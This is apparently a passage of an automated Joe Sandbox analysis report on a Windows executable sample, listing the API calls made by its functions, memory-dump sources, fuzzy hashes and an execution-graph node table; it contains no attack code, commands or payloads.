                                                          APIs
                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 004036F2
                                                          • SysAllocStringLen.OLEAUT32(?,00000000), ref: 004036FD
                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403710
                                                          • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 0040371A
                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403729
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2973146867.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2973114690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2973181716.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2973208785.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: ByteCharMultiWide$AllocString
                                                          • String ID:
                                                          • API String ID: 262959230-0
                                                          • Opcode ID: b88b94e5f034f8c4e706f080a825eb7b192e10e2750b3458b8a97e0288adf81d
                                                          • Instruction ID: 1285967c487f36a4f1f77a8b8e1f1fe351824cacfdb80e5859a13ebcd08b75b2
                                                          • Opcode Fuzzy Hash: b88b94e5f034f8c4e706f080a825eb7b192e10e2750b3458b8a97e0288adf81d
                                                          • Instruction Fuzzy Hash: 17F068A13442543AF56075A75C43FAB198CCB45BAEF10457FF704FA2C2D8B89D0492BD
                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(00000000,00409C56), ref: 004030E3
                                                          • GetCommandLineA.KERNEL32(00000000,00409C56), ref: 004030EE
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2973146867.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2973114690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2973181716.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2973208785.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: CommandHandleLineModule
                                                          • String ID: U1hd.@$%f
                                                          • API String ID: 2123368496-3738993387
                                                          • Opcode ID: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
                                                          • Instruction ID: 0f926add87520dc699e98d27074396f9fab16295c11a520b4b5863bd90c7cb52
                                                          • Opcode Fuzzy Hash: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
                                                          • Instruction Fuzzy Hash: 03C01274541300CAD328AFF69E8A304B990A385349F40823FA608BA2F1CA7C4201EBDD
                                                          APIs
                                                          • RtlInitializeCriticalSection.KERNEL32(0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040192E
                                                          • RtlEnterCriticalSection.KERNEL32(0040C41C,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 00401941
                                                          • LocalAlloc.KERNEL32(00000000,00000FF8,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040196B
                                                          • RtlLeaveCriticalSection.KERNEL32(0040C41C,004019D5,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 004019C8
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2973146867.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2973114690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2973181716.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2973208785.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                          • String ID:
                                                          • API String ID: 730355536-0
                                                          • Opcode ID: aabd9570e7a52811c13604d6a46282fe49281d95e81aad3d3e53893a1864dea1
                                                          • Instruction ID: 093a8b970c40f4dda7bd37408b901a2e20e4e29fb74a5496b56404d4d89a3717
                                                          • Opcode Fuzzy Hash: aabd9570e7a52811c13604d6a46282fe49281d95e81aad3d3e53893a1864dea1
                                                          • Instruction Fuzzy Hash: CC0161B0684240DEE715ABA999E6B353AA4E786744F10427FF080F62F2C67C4450CB9D
                                                          APIs
                                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,00406F48,?,00000000,004098D0,00000000), ref: 00406E4C
                                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,70000000,?,?,00000000,00000000,00000000,?,00000000,00406F48,?,00000000), ref: 00406EBC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2973146867.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2973114690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2973181716.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2973208785.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: QueryValue
                                                          • String ID: )q@
                                                          • API String ID: 3660427363-2284170586
                                                          • Opcode ID: 6b21a0d37a83e471fd9d1ddb0c1b743920aead1f80a5b526095c1b0a651cf177
                                                          • Instruction ID: 7350e5e82036d2c0193b98364cdb321f9e6d5b5bf7e48a12e03045d443e4f3bd
                                                          • Opcode Fuzzy Hash: 6b21a0d37a83e471fd9d1ddb0c1b743920aead1f80a5b526095c1b0a651cf177
                                                          • Instruction Fuzzy Hash: DC414C31D0021AAFDB21DF95C881BAFB7B8EB05704F56457AE901B7280D738AF108B99
                                                          APIs
                                                          • Sleep.KERNEL32(?,?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 004094F7
                                                          • Sleep.KERNEL32(?,?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 00409507
                                                          • GetLastError.KERNEL32(?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 0040951A
                                                          • GetLastError.KERNEL32(?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 00409524
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2973146867.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2973114690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2973181716.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2973208785.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: ErrorLastSleep
                                                          • String ID:
                                                          • API String ID: 1458359878-0
                                                          • Opcode ID: 597fcf42490b874720d4ad81cf19761f51130dad350fd41d24dc31ad960abd38
                                                          • Instruction ID: cd4a420f7ace5638a97e0bdb8a1e9fccbb234b9240edd4770f97938e6011a3cc
                                                          • Opcode Fuzzy Hash: 597fcf42490b874720d4ad81cf19761f51130dad350fd41d24dc31ad960abd38
                                                          • Instruction Fuzzy Hash: 16F0967360451477CA35A5AF9D81A5F634DDAD1354B10813BE945F3283C538DD0142A9

                                                          Execution Graph

                                                          Execution Coverage:16.1%
                                                          Dynamic/Decrypted Code Coverage:0%
                                                          Signature Coverage:4.4%
                                                          Total number of Nodes:2000
                                                          Total number of Limit Nodes:74
                                                          execution_graph 49750 402584 49751 402598 49750->49751 49752 4025ab 49750->49752 49780 4019cc RtlInitializeCriticalSection RtlEnterCriticalSection LocalAlloc RtlLeaveCriticalSection 49751->49780 49754 4025c2 RtlEnterCriticalSection 49752->49754 49755 4025cc 49752->49755 49754->49755 49766 4023b4 13 API calls 49755->49766 49756 40259d 49756->49752 49758 4025a1 49756->49758 49759 4025d5 49760 4025d9 49759->49760 49767 402088 49759->49767 49762 402635 49760->49762 49763 40262b RtlLeaveCriticalSection 49760->49763 49763->49762 49764 4025e5 49764->49760 49781 402210 9 API calls 49764->49781 49766->49759 49768 40209c 49767->49768 49769 4020af 49767->49769 49788 4019cc RtlInitializeCriticalSection RtlEnterCriticalSection LocalAlloc RtlLeaveCriticalSection 49768->49788 49770 4020c6 RtlEnterCriticalSection 49769->49770 49772 4020d0 49769->49772 49770->49772 49777 402106 49772->49777 49782 401f94 49772->49782 49773 4020a1 49773->49769 49774 4020a5 49773->49774 49774->49777 49777->49764 49778 4021f1 RtlLeaveCriticalSection 49779 4021fb 49778->49779 49779->49764 49780->49756 49781->49760 49785 401fa4 49782->49785 49783 401fd0 49787 401ff4 49783->49787 49794 401db4 49783->49794 49785->49783 49785->49787 49789 401f0c 49785->49789 49787->49778 49787->49779 49788->49773 49798 40178c 49789->49798 49792 401f29 49792->49785 49795 401e02 49794->49795 49796 401dd2 49794->49796 49795->49796 49821 401d1c 49795->49821 49796->49787 49801 4017a8 49798->49801 49800 4017b2 49817 401678 VirtualAlloc 49800->49817 49801->49800 49803 40180f 49801->49803 49806 401803 49801->49806 49809 4014e4 49801->49809 49818 4013e0 LocalAlloc 49801->49818 49803->49792 49808 401e80 9 API calls 49803->49808 49805 4017be 49805->49803 49819 4015c0 VirtualFree 49806->49819 49808->49792 49810 4014f3 VirtualAlloc 49809->49810 49812 401520 49810->49812 49813 401543 49810->49813 49820 401398 LocalAlloc 49812->49820 49813->49801 49815 40152c 49815->49813 49816 401530 VirtualFree 49815->49816 49816->49813 49817->49805 49818->49801 49819->49803 49820->49815 49822 401d2e 49821->49822 49823 401d51 49822->49823 49824 401d63 49822->49824 49834 401940 49823->49834 49825 401940 3 API calls 49824->49825 49827 401d61 49825->49827 49828 401d79 49827->49828 49844 401bf8 9 API calls 49827->49844 49828->49796 49830 401d88 49831 401da2 49830->49831 49845 401c4c 9 API calls 49830->49845 49846 401454 LocalAlloc 49831->49846 49835 401966 49834->49835 49843 4019bf 49834->49843 49847 40170c 49835->49847 49839 401983 49840 40199a 49839->49840 49852 4015c0 VirtualFree 49839->49852 49840->49843 49853 401454 LocalAlloc 49840->49853 49843->49827 49844->49830 49845->49831 49846->49828 49848 401743 49847->49848 49849 401783 49848->49849 49850 40175d VirtualFree 49848->49850 49851 4013e0 LocalAlloc 49849->49851 49850->49848 49851->49839 49852->49840 49853->49843 49854 44138c 49855 441395 49854->49855 49856 4413a3 WriteFile 49854->49856 49855->49856 49857 4413ae 49856->49857 49858 416408 49859 41641a 49858->49859 49860 41645a GetClassInfoA 49859->49860 49878 408d1c 19 API calls 49859->49878 49861 416486 49860->49861 49863 4164a8 RegisterClassA 49861->49863 49864 416498 UnregisterClassA 49861->49864 49868 4164e1 49861->49868 49865 4164d0 49863->49865 49863->49868 49864->49863 49879 408cac 49865->49879 49866 416455 49866->49860 49869 41650f 49868->49869 49870 4164fe 49868->49870 49887 407534 49869->49887 49870->49868 49871 408cac 5 API calls 49870->49871 49871->49869 49875 416528 49892 41a1e0 49875->49892 49877 416532 49878->49866 49880 408cb8 49879->49880 49900 406ddc LoadStringA 49880->49900 49888 407542 49887->49888 49889 407538 49887->49889 49891 41837c 7 API calls 49888->49891 49890 402660 4 API calls 49889->49890 49890->49888 49891->49875 49893 41a2a7 49892->49893 49894 41a20b 49892->49894 49895 403400 4 API calls 49893->49895 49933 403520 49894->49933 49896 41a2bf 49895->49896 49896->49877 49898 41a263 49899 41a29b CreateFontIndirectA 49898->49899 49899->49893 49913 4034e0 49900->49913 49903 403450 49904 403454 49903->49904 49907 403464 49903->49907 49906 4034bc 4 API calls 49904->49906 49904->49907 49905 403490 49909 403400 49905->49909 49906->49907 49907->49905 49928 402660 49907->49928 49910 403406 49909->49910 49911 40341f 49909->49911 49910->49911 49912 402660 4 API calls 49910->49912 49911->49868 49912->49911 49918 4034bc 49913->49918 49915 4034f0 49916 403400 4 API calls 49915->49916 49917 403508 49916->49917 49917->49903 49919 4034c0 49918->49919 49920 4034dc 49918->49920 49923 402648 49919->49923 49920->49915 49922 4034c9 49922->49915 49924 40264c 49923->49924 49925 402656 49923->49925 49924->49925 49927 4033bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 49924->49927 49925->49922 49925->49925 49927->49925 49929 402664 49928->49929 49930 40266e 49928->49930 49929->49930 49932 4033bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 49929->49932 49930->49905 49930->49930 49932->49930 49934 4034e0 4 API calls 49933->49934 49935 40352a 49934->49935 49935->49898 49936 490f80 49937 490fba 49936->49937 49938 490fbc 49937->49938 49939 490fc6 49937->49939 50136 409088 MessageBeep 49938->50136 49941 490ffe 49939->49941 49942 490fd5 49939->49942 49947 49100d 49941->49947 49948 491036 49941->49948 49944 446ff0 18 API calls 49942->49944 49946 490fe2 49944->49946 50137 406ba0 49946->50137 49951 446ff0 18 API calls 49947->49951 49957 49106e 49948->49957 49958 491045 49948->49958 49949 403400 4 API calls 49952 49161a 49949->49952 49954 49101a 49951->49954 50145 406bf0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 49954->50145 49964 49107d 49957->49964 49965 491096 49957->49965 49960 446ff0 18 API calls 49958->49960 49959 491025 50146 447344 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49959->50146 49961 491052 49960->49961 50147 406c24 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 49961->50147 50149 407270 LocalAlloc TlsSetValue TlsGetValue TlsGetValue GetCurrentDirectoryA 49964->50149 49970 4910ca 49965->49970 49971 4910a5 49965->49971 49966 49105d 50148 447344 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49966->50148 49969 491085 50150 447344 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49969->50150 49976 4910d9 49970->49976 49977 491102 49970->49977 49973 446ff0 18 API calls 49971->49973 49974 4910b2 49973->49974 50151 407298 49974->50151 49979 446ff0 18 API calls 49976->49979 49982 49113a 49977->49982 49983 491111 49977->49983 49978 4910ba 50154 4470c8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49978->50154 49981 4910e6 49979->49981 50155 42c7fc 49981->50155 49990 491149 49982->49990 49991 491186 49982->49991 49985 446ff0 18 API calls 49983->49985 49987 49111e 49985->49987 50165 4071e8 8 API calls 49987->50165 49993 446ff0 18 API calls 49990->49993 49997 4911be 49991->49997 49998 491195 49991->49998 49992 491129 50166 447344 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49992->50166 49994 491158 49993->49994 49996 446ff0 18 API calls 49994->49996 49999 491169 49996->49999 50004 4911cd 49997->50004 50005 4911f6 49997->50005 50000 446ff0 18 API calls 49998->50000 50167 490c84 8 API calls 49999->50167 50002 4911a2 50000->50002 50169 42c89c 50002->50169 50003 491175 50168 447344 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50003->50168 50008 446ff0 18 API calls 50004->50008 50013 49122e 50005->50013 50014 491205 50005->50014 50010 4911da 50008->50010 50175 42c8c4 50010->50175 50020 49123d 50013->50020 50021 491266 50013->50021 50016 446ff0 18 API calls 50014->50016 50017 491212 50016->50017 50184 42c8f4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue IsDBCSLeadByte 50017->50184 50023 446ff0 18 API calls 50020->50023 50026 49129e 50021->50026 50027 491275 50021->50027 50022 49121d 50185 447344 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50022->50185 50025 49124a 50023->50025 50186 42c924 50025->50186 50034 4912ea 50026->50034 50035 4912ad 50026->50035 50029 446ff0 18 API calls 50027->50029 50031 491282 50029->50031 50192 42c94c 50031->50192 50040 4912f9 50034->50040 50041 49133c 50034->50041 50037 446ff0 18 API calls 50035->50037 50039 4912bc 50037->50039 50042 446ff0 18 API calls 50039->50042 50044 446ff0 18 API calls 50040->50044 50048 49134b 50041->50048 50049 4913af 50041->50049 50043 4912cd 50042->50043 50198 42c4f0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue IsDBCSLeadByte 50043->50198 50046 49130c 50044->50046 50050 446ff0 18 API calls 50046->50050 50047 4912d9 50199 447344 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50047->50199 50124 446ff0 50048->50124 50057 4913ee 50049->50057 50058 4913be 50049->50058 50053 49131d 50050->50053 50200 490e7c 12 API calls 50053->50200 50054 490fc1 50231 403420 50054->50231 50067 49142d 50057->50067 50068 4913fd 50057->50068 50061 446ff0 18 API calls 50058->50061 50060 49132b 50201 447344 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50060->50201 50064 4913cb 50061->50064 50062 491366 50065 49136a 50062->50065 50066 49139f 50062->50066 50204 4528dc Wow64DisableWow64FsRedirection SetLastError Wow64RevertWow64FsRedirection DeleteFileA GetLastError 50064->50204 50071 446ff0 18 API calls 50065->50071 50203 4470c8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50066->50203 50079 49146c 50067->50079 50080 49143c 50067->50080 50072 446ff0 18 API calls 50068->50072 50074 491379 50071->50074 50075 49140a 50072->50075 50073 4913d8 50205 4470c8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50073->50205 50129 452c54 50074->50129 50206 452744 50075->50206 50088 49147b 50079->50088 50089 4914b4 50079->50089 50084 446ff0 18 API calls 50080->50084 50081 4913e9 50081->50054 50082 491389 50202 4470c8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50082->50202 50083 491417 50213 4470c8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50083->50213 50087 491449 50084->50087 50214 452de4 Wow64DisableWow64FsRedirection SetLastError Wow64RevertWow64FsRedirection RemoveDirectoryA GetLastError 50087->50214 50091 446ff0 18 API calls 50088->50091 50095 4914fc 50089->50095 50096 4914c3 50089->50096 50093 49148a 50091->50093 50092 491456 50215 4470c8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50092->50215 50097 446ff0 18 API calls 50093->50097 50102 49150f 50095->50102 50107 4915c5 50095->50107 50098 446ff0 18 API calls 50096->50098 50099 49149b 50097->50099 50100 4914d2 50098->50100 50216 447270 50099->50216 50101 446ff0 18 API calls 50100->50101 50103 4914e3 50101->50103 50105 446ff0 18 API calls 50102->50105 50111 447270 5 API calls 50103->50111 50106 49153c 50105->50106 50108 446ff0 18 API calls 50106->50108 50107->50054 50225 446f94 18 API calls 50107->50225 50109 491553 50108->50109 50222 407dcc 7 API calls 50109->50222 50111->50054 50112 4915de 50226 42e8c0 FormatMessageA 50112->50226 50117 491575 50118 446ff0 18 API calls 50117->50118 50119 491589 50118->50119 50223 4084f8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50119->50223 50121 491594 50224 447344 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50121->50224 50123 4915a0 50125 446ff8 50124->50125 50235 436070 50125->50235 50127 447017 50128 42c600 7 API calls 50127->50128 50128->50062 50265 4526f8 50129->50265 50131 452c71 50131->50082 50132 452c6d 50132->50131 50133 452c95 MoveFileA GetLastError 50132->50133 50271 452734 50133->50271 50136->50054 50138 406baf 50137->50138 50139 406bd1 50138->50139 50140 406bc8 50138->50140 50274 403778 50139->50274 50141 403400 4 API calls 50140->50141 50142 406bcf 50141->50142 50144 447344 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50142->50144 50144->50054 50145->49959 50146->50054 50147->49966 50148->50054 50149->49969 50150->50054 50281 403738 50151->50281 50154->50054 50156 403738 50155->50156 50157 42c81f GetFullPathNameA 50156->50157 50158 42c842 50157->50158 50159 42c82b 50157->50159 50161 403494 4 API calls 50158->50161 50159->50158 50160 42c833 50159->50160 50162 4034e0 4 API calls 50160->50162 50163 42c840 50161->50163 50162->50163 50164 447344 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50163->50164 50164->50054 50165->49992 50166->50054 50167->50003 50168->50054 50283 42c794 50169->50283 50172 403778 4 API calls 50173 42c8bd 50172->50173 50174 447344 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50173->50174 50174->50054 50298 42c66c 50175->50298 50178 42c8e1 50181 403778 4 API calls 50178->50181 50179 42c8d8 50180 403400 4 API calls 50179->50180 50182 42c8df 50180->50182 50181->50182 50183 447344 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50182->50183 50183->50054 50184->50022 50185->50054 50187 42c794 IsDBCSLeadByte 50186->50187 50188 42c934 50187->50188 50189 403778 4 API calls 50188->50189 50190 42c946 50189->50190 50191 447344 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50190->50191 50191->50054 50193 42c794 IsDBCSLeadByte 50192->50193 50194 42c95c 50193->50194 50195 403778 4 API calls 50194->50195 50196 42c96d 50195->50196 50197 447344 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50196->50197 50197->50054 50198->50047 50199->50054 50200->50060 50201->50054 50202->50054 50203->50054 50204->50073 50205->50081 50207 4526f8 2 API calls 50206->50207 50208 45275a 50207->50208 50209 45275e 50208->50209 50210 45277c CreateDirectoryA GetLastError 50208->50210 50209->50083 50211 452734 Wow64RevertWow64FsRedirection 50210->50211 50212 4527a2 50211->50212 50212->50083 50213->50054 50214->50092 50215->50054 50217 447278 50216->50217 50301 4363d8 VariantClear 50217->50301 50219 44729b 50221 4472b2 50219->50221 50302 408bfc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50219->50302 50221->50054 50222->50117 50223->50121 50224->50123 50225->50112 50227 42e8e6 50226->50227 50228 4034e0 4 API calls 50227->50228 50229 42e903 50228->50229 50230 447344 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50229->50230 50230->50054 50232 403426 50231->50232 50233 40344b 50232->50233 50234 402660 4 API calls 50232->50234 50233->49949 50234->50232 50236 43607c 50235->50236 50238 43609e 50235->50238 50236->50238 50255 408bfc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50236->50255 50237 436121 50264 408bfc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50237->50264 50238->50237 50240 4360f1 50238->50240 50241 4360e5 50238->50241 50242 436115 50238->50242 50243 436109 50238->50243 50248 4360fd 50238->50248 50247 403510 4 API calls 50240->50247 50256 403510 50241->50256 50263 4040e8 18 API calls 50242->50263 50259 403494 50243->50259 50245 436132 50245->50127 50252 4360fa 50247->50252 50248->50127 50252->50127 50254 43611e 50254->50127 50255->50238 50257 4034e0 4 API calls 50256->50257 50258 40351d 50257->50258 50258->50127 50260 403498 50259->50260 50261 4034ba 50260->50261 50262 402660 4 API calls 50260->50262 50261->50127 50262->50261 50263->50254 50264->50245 50266 452706 50265->50266 50267 452702 50265->50267 50268 45270f Wow64DisableWow64FsRedirection 50266->50268 50269 452728 SetLastError 50266->50269 50267->50132 50270 452723 50268->50270 50269->50270 50270->50132 50272 452743 50271->50272 50273 452739 Wow64RevertWow64FsRedirection 50271->50273 50272->50082 50273->50272 50275 4037aa 50274->50275 50277 40377d 50274->50277 50276 403400 4 API calls 50275->50276 50280 4037a0 50276->50280 50277->50275 50278 403791 50277->50278 50279 4034e0 4 API calls 50278->50279 50279->50280 50280->50142 50282 40373c SetCurrentDirectoryA 50281->50282 50282->49978 50288 42c674 50283->50288 50285 42c7f3 50285->50172 50287 42c7a9 50287->50285 50295 42c43c IsDBCSLeadByte 50287->50295 50291 42c685 50288->50291 50289 42c6e9 50292 42c6e4 50289->50292 50297 42c43c IsDBCSLeadByte 50289->50297 50291->50289 50293 42c6a3 50291->50293 50292->50287 50293->50292 50296 42c43c IsDBCSLeadByte 50293->50296 50295->50287 50296->50293 50297->50292 50299 42c674 IsDBCSLeadByte 50298->50299 50300 42c673 50299->50300 50300->50178 50300->50179 50301->50219 50302->50221 50303 480002 50304 48000b 50303->50304 50306 480036 50303->50306 50305 480028 50304->50305 50304->50306 50711 4766e4 189 API calls 50305->50711 50307 480075 50306->50307 50713 47eaec LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50306->50713 50308 480099 50307->50308 50311 48008c 50307->50311 50312 48008e 50307->50312 50316 4800d5 50308->50316 50317 4800b7 50308->50317 50321 47eb30 42 API calls 50311->50321 50715 47ebc4 42 API calls 50312->50715 50313 48002d 50313->50306 50712 408bd0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 50313->50712 50314 480068 50714 47eb54 42 API calls 50314->50714 50718 47e984 24 API calls 50316->50718 50322 4800cc 50317->50322 50716 47eb54 42 API calls 50317->50716 50321->50308 50717 47e984 24 API calls 50322->50717 50324 4800d3 50326 4800eb 50324->50326 50327 4800e5 50324->50327 50328 4800e9 50326->50328 50329 47eb30 42 API calls 50326->50329 50327->50328 50429 47eb30 50327->50429 50434 47bf1c 50328->50434 50329->50328 50787 47e618 42 API calls 50429->50787 50431 47eb4b 50788 408bd0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 50431->50788 50789 42d890 GetWindowsDirectoryA 50434->50789 50436 47bf3a 50437 403450 4 API calls 50436->50437 50438 47bf47 50437->50438 50791 42d8bc GetSystemDirectoryA 50438->50791 50440 47bf4f 50441 403450 4 API calls 50440->50441 50442 47bf5c 50441->50442 50793 42d8e8 50442->50793 50444 47bf64 50445 403450 4 API calls 50444->50445 50446 47bf71 50445->50446 50447 47bf96 50446->50447 50448 47bf7a 50446->50448 50450 403400 4 API calls 50447->50450 50849 42d200 50448->50849 50452 47bf94 50450->50452 50454 47bfdb 50452->50454 50456 42c8c4 5 API calls 50452->50456 50453 403450 4 API calls 50453->50452 50797 47bda4 50454->50797 50458 47bfb6 50456->50458 50460 403450 4 API calls 50458->50460 50459 403450 4 API calls 50463 47bff7 50459->50463 50461 47bfc3 50460->50461 50461->50454 50464 403450 4 API calls 50461->50464 50462 47c015 50466 47bda4 8 API calls 50462->50466 50463->50462 50465 4035c0 4 API calls 50463->50465 50464->50454 50465->50462 50467 47c024 50466->50467 50468 403450 4 API calls 50467->50468 50469 47c031 50468->50469 50470 47c059 50469->50470 50471 42c3f4 5 API calls 50469->50471 50472 47c0c0 50470->50472 50476 47bda4 8 API calls 50470->50476 50473 47c047 50471->50473 50474 47c0ea 50472->50474 50475 47c0c9 50472->50475 50477 4035c0 4 API calls 50473->50477 50808 42c3f4 50474->50808 50478 42c3f4 5 API calls 50475->50478 50479 47c071 50476->50479 50477->50470 50481 47c0d6 50478->50481 50482 403450 4 API calls 50479->50482 50484 4035c0 4 API calls 50481->50484 50485 47c07e 50482->50485 50711->50313 50713->50314 50714->50307 50715->50308 50716->50322 50717->50324 50718->50324 50787->50431 50790 42d8b1 50789->50790 50790->50436 50792 42d8dd 50791->50792 50792->50440 50794 403400 4 API calls 50793->50794 50795 42d8f8 GetModuleHandleA GetProcAddress 50794->50795 50796 42d911 50795->50796 50796->50444 50859 42de14 50797->50859 50799 47bdca 50800 47bdf0 50799->50800 50801 47bdce 50799->50801 50803 403400 4 API calls 50800->50803 50862 42dd44 50801->50862 50804 47bdf7 50803->50804 50804->50459 50806 47bde5 RegCloseKey 50806->50804 50807 403400 4 API calls 50807->50806 50809 42c421 50808->50809 50810 42c3fe 50808->50810 50850 4038a4 4 API calls 50849->50850 50851 42d213 50850->50851 50852 42d22a GetEnvironmentVariableA 50851->50852 50856 42d23d 50851->50856 50897 42dbc8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50851->50897 50852->50851 50853 42d236 50852->50853 50854 403400 4 API calls 50853->50854 50854->50856 50856->50453 50860 42de25 RegOpenKeyExA 50859->50860 50861 42de1f 50859->50861 50860->50799 50861->50860 50865 42dbf8 50862->50865 50866 42dc1e RegQueryValueExA 50865->50866 50872 42dc41 50866->50872 50881 42dc63 50866->50881 50867 403400 4 API calls 50869 42dd2f 50867->50869 50868 42dc5b 50870 403400 4 API calls 50868->50870 50869->50806 50869->50807 50870->50881 50871 4034e0 4 API calls 50871->50872 50872->50868 50872->50871 50872->50881 50882 403744 50872->50882 50874 42dc98 RegQueryValueExA 50874->50866 50875 42dcb4 50874->50875 50875->50881 50886 4038a4 50875->50886 50878 42dd08 50879 403450 4 API calls 50878->50879 50879->50881 50880 403744 4 API calls 50880->50878 50881->50867 50883 40374a 50882->50883 50885 40375b 50882->50885 50884 4034bc 4 API calls 50883->50884 50883->50885 50884->50885 50885->50874 50887 4038b1 50886->50887 50888 4038e1 50886->50888 50889 4038da 50887->50889 50891 4038bd 50887->50891 50890 403400 4 API calls 50888->50890 50892 4034bc 4 API calls 50889->50892 50893 4038cb 50890->50893 50895 402678 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50891->50895 50892->50888 50893->50878 50893->50880 50895->50893 50897->50851 52959 491d44 52960 491d78 52959->52960 52961 491d7a 52960->52961 52962 